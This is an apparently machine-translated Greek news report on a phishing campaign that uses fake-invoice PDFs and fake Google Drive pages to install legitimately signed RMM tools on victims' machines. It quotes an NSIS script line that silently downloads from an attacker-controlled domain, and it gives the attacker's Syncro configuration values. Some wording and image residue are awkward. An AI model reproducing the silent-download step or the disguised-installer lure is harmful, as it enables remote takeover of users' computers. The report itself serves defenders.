Ένα νέο κύμα επιθέσεων στον κυβερνοχώρο έχει εμφανιστεί όπου οι παράγοντες απειλών χρησιμοποιούν οπλισμένα αρχεία PDF για να εξαπατήσουν τους χρήστες να εγκαταστήσουν εργαλεία απομακρυσμένης παρακολούθησης και διαχείρισης στα συστήματά τους.
Αυτές οι επιθέσεις εκμεταλλεύονται την αξιόπιστη φύση του λογισμικού RMM όπως το Syncro, το SuperOps, το NinjaOne και το ConnectWise ScreenConnect για να αποκτήσουν μη εξουσιοδοτημένη πρόσβαση σε μηχανήματα-θύματα.
Τα κακόβουλα έγγραφα PDF είναι καλυμμένα με ονόματα αρχείων όπως “Τιμολόγιο”, “Παραγγελία προϊόντος” και “Πληρωμή”, υποδηλώνοντας ότι διανέμονται μέσω καμπανιών ηλεκτρονικού “ψαρέματος” που στοχεύουν επιχειρήσεις και ιδιώτες.
Όταν οι χρήστες ανοίγουν αυτά τα αρχεία PDF, αντιμετωπίζουν είτε μια εικόνα υψηλής ποιότητας που εμποδίζει την προεπισκόπηση είτε ένα μήνυμα σφάλματος που αναφέρει “Αποτυχία φόρτωσης του εγγράφου PDF”.
Και τα δύο σενάρια ωθούν τα θύματα να κάνουν κλικ σε έναν σύνδεσμο που τα ανακατευθύνει σε ψεύτικες σελίδες του Google Drive ή σε δόλιους ιστότοπους που υποδύονται την Adobe.
Η ψεύτικη σελίδα του Google Drive εμφανίζει αυτό που φαίνεται να είναι ένα αρχείο βίντεο με το όνομα “Video_recorded_on_iPhone17.mp4”, το οποίο είναι στην πραγματικότητα ένα μεταμφιεσμένο πρόγραμμα εγκατάστασης RMM.
Το ληφθέν αρχείο διατηρεί το παραπλανητικό μοτίβο ονομασίας “Video_recorded_on_iPhone17.mp4 Drive.google.com” για να πείσει περαιτέρω τους χρήστες ότι κατεβάζουν ένα νόμιμο βίντεο.
ερευνητές ASEC αναγνωρισθείς ότι αυτές οι επιθέσεις συνεχίζονται τουλάχιστον από τον Οκτώβριο του 2025, με βάση τα ψηφιακά πιστοποιητικά που χρησιμοποιούνται για την υπογραφή των κακόβουλων προγραμμάτων εγκατάστασης.
Ο παράγοντας απειλής πίσω από αυτήν την καμπάνια διανέμει συστηματικά πολλά εργαλεία RMM, όλα υπογεγραμμένα με το ίδιο έγκυρο πιστοποιητικό για να αποφύγει τον εντοπισμό από προϊόντα ασφαλείας.
.webp.jpeg "Ηθοποιοί απειλών που αξιοποιούν τα εργαλεία RMM για να επιτεθούν σε χρήστες μέσω οπλισμένων αρχείων PDF")
Αυτή η προσέγγιση επιτρέπει στους εισβολείς να παρακάμψουν τα παραδοσιακά μέτρα ασφαλείας, καθώς τα εργαλεία RMM έχουν σχεδιαστεί για νόμιμους διαχειριστικούς σκοπούς και δεν ταξινομούνται ως συμβατικά κακόβουλα προγράμματα, όπως τα backdoors ή τα Trojan Remote Access.
.webp.jpeg "Ηθοποιοί απειλών που αξιοποιούν τα εργαλεία RMM για να επιτεθούν σε χρήστες μέσω οπλισμένων αρχείων PDF")
Η επίθεση αξιοποιεί την εγγενή εμπιστοσύνη που δίνουν οι λύσεις ασφαλείας στο λογισμικό RMM. Δεδομένου ότι αυτά τα εργαλεία χρησιμοποιούνται συνήθως από διαχειριζόμενους παρόχους υπηρεσιών και ομάδες IT για νόμιμη απομακρυσμένη διαχείριση, τα τείχη προστασίας και τα προγράμματα κατά του κακόβουλου λογισμικού συχνά δυσκολεύονται να τα αναγνωρίσουν ως απειλές.
Αυτό δημιουργεί ένα επικίνδυνο τυφλό σημείο που οι εισβολείς εκμεταλλεύονται ενεργά για να δημιουργήσουν μόνιμη απομακρυσμένη πρόσβαση σε παραβιασμένα συστήματα.
Τεχνική Ανάλυση Μηχανισμού Λοιμώξεων
Η διαδικασία μόλυνσης ξεκινά όταν το θύμα κατεβάσει αυτό που πιστεύει ότι είναι ένα αρχείο βίντεο από την ψεύτικη σελίδα του Google Drive.
Το ληφθέν εκτελέσιμο αρχείο είναι στην πραγματικότητα ένα πρόγραμμα εγκατάστασης που δημιουργήθηκε με το Advanced Installer ή το NSIS που αναπτύσσει το εργαλείο RMM στο σύστημα προορισμού.
.webp.jpeg "Ηθοποιοί απειλών που αξιοποιούν τα εργαλεία RMM για να επιτεθούν σε χρήστες μέσω οπλισμένων αρχείων PDF")
Για εγκαταστάσεις Syncro RMM, το κακόβουλο λογισμικό χρησιμοποιεί συγκεκριμένες παραμέτρους κατά την εκτέλεση, συμπεριλαμβανομένης της τιμής “κλειδιού” “yK0UAOaHHwdbYDOp_sr51w” και ενός “πελάτη” του “1709830”.
Αυτές οι λεπτομέρειες διαμόρφωσης επιτρέπουν στον παράγοντα απειλής να αναγνωρίζει και να ελέγχει εξ αποστάσεως μολυσμένα μηχανήματα μέσω της νόμιμης υποδομής της πλατφόρμας RMM.
.webp.jpeg "Ηθοποιοί απειλών που αξιοποιούν τα εργαλεία RMM για να επιτεθούν σε χρήστες μέσω οπλισμένων αρχείων PDF")
Η παραλλαγή προγράμματος λήψης που βασίζεται στο NSIS περιέχει ενσωματωμένα σενάρια που ανακτούν πρόσθετα ωφέλιμα φορτία από διακομιστές που ελέγχονται από εισβολείς. Το κακόβουλο σενάριο NSI εκτελεί εντολές όπως:
StrCpy $0 $TEMP\temp_response.html
INetC::get/silent https://anhemvn124.com $0Αυτή η εντολή κατεβάζει σιωπηλά αρχεία από τον κακόβουλο τομέα και προετοιμάζει το σύστημα για περαιτέρω συμβιβασμό. Στη συνέχεια, το πρόγραμμα εγκατάστασης αναπτύσσει το NinjaOne RMM χρησιμοποιώντας το Windows Installer με εκτέλεση αθόρυβης λειτουργίας για να αποφύγει τον εντοπισμό του χρήστη.
